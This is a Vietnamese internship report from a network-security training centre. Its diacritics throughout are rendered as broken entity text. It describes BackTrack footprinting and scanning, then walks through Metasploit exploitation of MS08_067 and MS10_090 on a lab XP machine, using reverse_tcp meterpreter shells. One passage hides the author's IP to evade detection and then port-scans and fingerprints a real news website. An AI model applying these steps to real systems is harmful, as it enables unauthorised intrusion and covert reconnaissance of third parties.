11 GIỚI THIỆU VỀ COcircNG TY
Trung Tacircm Đagraveo Tạo Mạng vagrave Quản Trị Mạng Quốc Tế ATHENA tiền thacircn lagrave Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng (tecircn thương hiệu viết tắt lagrave TRUNG
TAcircM ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
Tecircn cocircng ty viết bằng tiếng nước ngoagravei ATHENA ADVICE TRAINING NETWORK
SECURITY COMPANY LIMITED
12 LỊCH SỬ HIgraveNH THAgraveNH
Năm 2000 một nhoacutem caacutec thagravenh viecircn lagrave những doanh nhacircn tagravei năng vagrave thagravenh cocircng trong
lĩnh vực cocircng nghệ thocircng tin đatilde nhận ra tiềm năng phaacutet triển của việc đagraveo tạo nền cocircng
nghệ thocircng tin nước nhagrave Họ lagrave những caacute nhacircn coacute trigravenh độ chuyecircn mocircn cao vagrave coacute đầu oacutec
latildenh đạo cugraveng với tầm nhigraven vagrave về tương lai của ngagravenh cocircng nghệ thocircng tin họ đatilde quy tụ
được một lực lượng lớn đội ngũ cocircng nghệ thocircng tin trước hết lagrave lagravem nhiệm vụ ứng cứu
maacutey tiacutenh cho caacutec doanh nghiệp caacute nhacircn coacute nhu cầu Bước phaacutet triển tiếp theo lagrave vươn tầm
đagraveo tạo đội ngũ caacuten bộ cocircng nghệ thocircng tin cho đất nước vagrave xatilde hội
Caacutec thagravenh viecircn saacuteng lập bao gồm
Ocircng Nguyễn Thế Đocircng Cựu giaacutem đốc trung tacircm ứng cứu Athena hiện tại lagrave giaacutem đốc
dự aacuten cocircng ty Siemen Telecom
Ocircng Hứa Văn Thế Phuacutec Phoacute Giaacutem Đốc Phaacutet triển Thương Mại Cocircng ty EIS Phoacute
Tổng Cocircng ty FPT
Ocircng Nghiecircm Sỹ Thắng Phoacute Tổng Giaacutem Đốc Ngacircn hagraveng Liecircn Việt chịu traacutech nhiệm
cocircng nghệ thocircng tin của ngacircn hagraveng
Ocircng Votilde Đỗ Thắng hiện lagrave Giaacutem Đốc Trung tacircm đagraveo tạo quản trị vagrave an ninh mạng
Athena
Đến năm 2003 bốn thagravenh viecircn saacuteng lập cugraveng với đội ngũ ứng cứu maacutey tiacutenh gần 100 thagravenh
viecircn hoạt động như lagrave một nhoacutem một tổ chức ứng cứu maacutey tiacutenh miền Nam Cocircng ty
TNHH Tư vấn vagrave Đagraveo tạo quản trị mạng Việt Năng hay cograven gọi lagrave Trung tacircm đagraveo tạo
Quản trị vagrave An ninh mạng Quốc Tế Athena (tecircn thương hiệu viết tắt lagrave TRUNG TAcircM
ĐAgraveO TẠO ATHENA) được chiacutenh thức thagravenh lập theo giấy pheacutep kinh doanh số
2
4104006757 của Sở Kế Hoạch Vagrave Đầu Tư Tp Hồ Chiacute Minh cấp ngagravey 04 thaacuteng 11 năm
2008
13 QUAacute TRIgraveNH PHAacuteT TRIỂN
Từ năm 2004 - 2006 Trung tacircm coacute nhiều bước phaacutet triển vagrave chuyển migravenh Trung tacircm trở
thagravenh một trong những địa chỉ đaacuteng tin cậy của nhiều doanh nghiệp nhằm cagravei đặt hệ thống
an ninh vagrave đagraveo tạo cho đội ngũ nhacircn viecircn caacutec doanh nghiệp về caacutec chương trigravenh quản lyacute
dự aacuten MS Project 2003 kỹ năng thương mại điện tử vagrave bảo mật webvagrave lagrave địa chỉ đaacuteng
tin cậy của nhiều học sinh sinh viecircn đến đăng kyacute học Đogravei hỏi cấp thiết trong thời gian
nagravey của trung tacircm lagrave nacircng cao hơn nữa đội ngũ giảng viecircn cũng như cơ sở để đaacutep ứng
nhu cầu ngagravey cagraveng cao về cocircng nghệ thocircng tin của đất nước noacutei chung doanh nghiệp caacute
nhacircn noacutei riecircng
Đến năm 2006 Trung tacircm đagraveo tạo vagrave quản trị mạng Athena mở ra một chi nhaacutenh tại cư xaacute
Nguyễn Văn Trỗi Đồng thời tiếp tục tuyển dụng đội ngũ giảng viecircn lagrave những chuyecircn gia
an ninh mạng tốt nghiệp caacutec trường đại học vagrave học viện cocircng nghệ thocircng tin uy tiacuten trecircn
toagraven quốc đồng thời trong thơi gian nagravey Athena coacute nhiều chiacutenh saacutech ưu đatildei nhằm thu huacutet
đội ngũ nhacircn lực cocircng nghệ thocircng tin lagravenh nghề từ caacutec tổ chức doanh nghiệp nhằm lagravem
giagraveu thecircm đội ngũ của trung tacircm
Đến năm 2008 Hagraveng loạt caacutec trung tacircm đagraveo tạo quản trị vagrave an ninh mạng mọc lecircn cugraveng
với khủng hoảng kinh tế tagravei chiacutenh toagraven cầu đatilde lagravem cho Trung tacircm gặp nhiều khoacute khăn
Ocircng Nguyễn Thế Đocircng cugraveng ocircng Hứa Văn Thế Phuacutec ruacutet vocircn khỏi cocircng ty gacircy necircn sự
hoang man cho toagraven bộ hệ thống của trung tacircm cộng thecircm hoạt động tại chi nhaacutenh
Nguyễn Văn Trỗi khocircng cograven hiệu quả phải đoacuteng cửa lagravem cho trung tacircm rơi từ khoacute khăn
nagravey đến khoacute khăn khaacutec
Luacutec nagravey với quyết tacircm khocirci phục lại cocircng ty cũng như tiếp tục sứ mạng goacutep phần vagraveo
tiến trigravenh tin học hoacutea đất nước Ocircng Votilde Đỗ Thắng mua lại cổ phần của hai nhagrave đầu tư lecircn
lagravem giaacutem đốc vagrave xacircy dựng lại trung tacircm mở ra một lagraven gioacute mới vagrave giai đoạn mới cugraveng
với quyết tacircm mạnh mẽ vagrave tinh thần theacutep đatilde giuacutep ocircng vượt qua nhiều khoacute khăn ban đầu
giuacutep trung tacircm đứng vững trong thời kỳ khủng hoảng
Từ năm 2009 - nay Cugraveng với sự latildenh đạo tagravei tigravenh vagrave đầu oacutec chiến lược trung tacircm dần
được phục hồi vagrave trở lại quỹ đạo hoạt động của migravenh Đến nay trung tacircm đatilde trở thagravenh
một trong những trung tacircm đagraveo tạo quản trị mạng hagraveng đầu Việt Nam Cugraveng với sự liecircn
kết rất nhiều cocircng ty vagrave doanh nghiệp trung tacircm trở thagravenh nơi đagraveo tạo vagrave cung cấp nguồn
3
nhacircn lực cocircng nghệ thocircng tin cho xatilde hội Từng bước thực hiện mục tiecircu goacutep phần vagraveo tiến
trigravenh tin học hoacutea nước nhagrave
14 CHỨC NĂNG VAgrave NHIỆM VỤ
Trung tacircm ATHENA lagrave nơi đagraveo tạo phaacutet triển nguồn nhacircn lực cocircng nghệ thocircng tin nước
nhagrave lagrave nơi magrave bất cứ ai yecircu thiacutech vagrave đam cocircng nghệ thocircng tin phaacutet triển kỹ năng nghề
nghiệp tương lai đồng thời ATHENA cũng lagrave nơi bồi dưỡng những kỹ năng cũng như trao
đổi kinh nghiệm thực tế qua những những chương trigravenh đagraveo tạo ngắn hạn miễn phiacute với
mọi người ngoagravei ra ATHENA cograven coacute những khoacutea học dagravei hạn nhằm bổ sung củng cố
kiến thức cho sinh viecircn học sinh hay cho người đatilde đi lagravem muốn nacircng cao thecircm tay nghề
của migravenh
15 CƠ CẤU TỔ CHỨC
16 LĨNH VỰC HOẠT ĐỘNG KINH DOANH
Trung tacircm ATHENA đatilde vagrave đang tập trung chủ yếu vagraveo đagraveo tạo chuyecircn sacircu quản trị
mạng an ninh mạng thương mại điện tử theo caacutec tiecircu chuẩn quốc tế của caacutec hatildeng nổi
tiếng như Microsoft Cisco Oracle Linux LPI CEH Song song đoacute trung tacircm
ATHENA cograven coacute những chương trigravenh đagraveo tạo cao cấp dagravenh riecircng theo đơn đặt hagraveng
của caacutec đơn vị như Bộ Quốc Phograveng Bộ Cocircng An ngacircn hagraveng doanh nghiệp caacutec cơ
quan chiacutenh phủ tổ chức tagravei chiacutenh
4
Sau gần 10 năm hoạt động nhiều học viecircn tốt nghiệp trung tacircm ATHENA đatilde lagrave chuyecircn gia
đảm nhận cocircng taacutec quản lyacute hệ thống mạng an ninh mạng cho nhiều bộ ngagravenh như Cục
Cocircng Nghệ Thocircng Tin - Bộ Quốc Phograveng Bộ Cocircng An Sở Thocircng Tin Truyền Thocircng caacutec
tỉnh bưu điện caacutec tỉnh
Ngoagravei chương trigravenh đagraveo tạo Trung tacircm ATHENA cograven coacute nhiều chương trigravenh hợp taacutec
vagrave trao đổi cocircng nghệ với nhiều đại học lớn như đại học Baacutech Khoa Thagravenh Phố Hồ
Chiacutenh Minh Học Viện An Ninh Nhacircn Dacircn( Thủ Đức) Học Viện Bưu Chiacutenh Viễn
Thocircng Hiệp hội an toagraven thocircng tin (VNISA) Viện Kỹ Thuật Quacircn Sự
17 THOcircNG TIN VỀ DỰ AacuteN SINH VIEcircN THAM GIA THỰC TẬP
- Nghiecircn cứu vagrave hướng dẫn sử dụng caacutec chức năng backtrack để kiểm tra an ninh
mạng
Tigravem hiểu caacutec cocircng cụ thu thập thocircng tin
Tigravem hiểu caacutec cocircng cụ Target Discovery
Tigravem hiểu caacutec cocircng cụ scan lỗi
Tigravem hiểu caacutec cocircng cụ Enumeration
Tigravem hiểu caacutec cocircng cụ exploit
Tigravem hiểu caacutec cocircng cụ Privilege Escalation
Tigravem hiểu caacutec cocircng cụ Maintaining Access
- Caacutec bước cần chuẩn bị
Hệ điều hagravenh BackTrack windows XPwindows 7windows 8
Phần mềm VMware
VPS
Hệ thống mạng Internet
CHƯƠNG 2 THỰC TRẠNG QUAacute TRIgraveNH THỰC HIỆN DỰ AacuteN MẠNG
21 TIẾN ĐỘ THỰC HIỆN DỰ AacuteN
- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
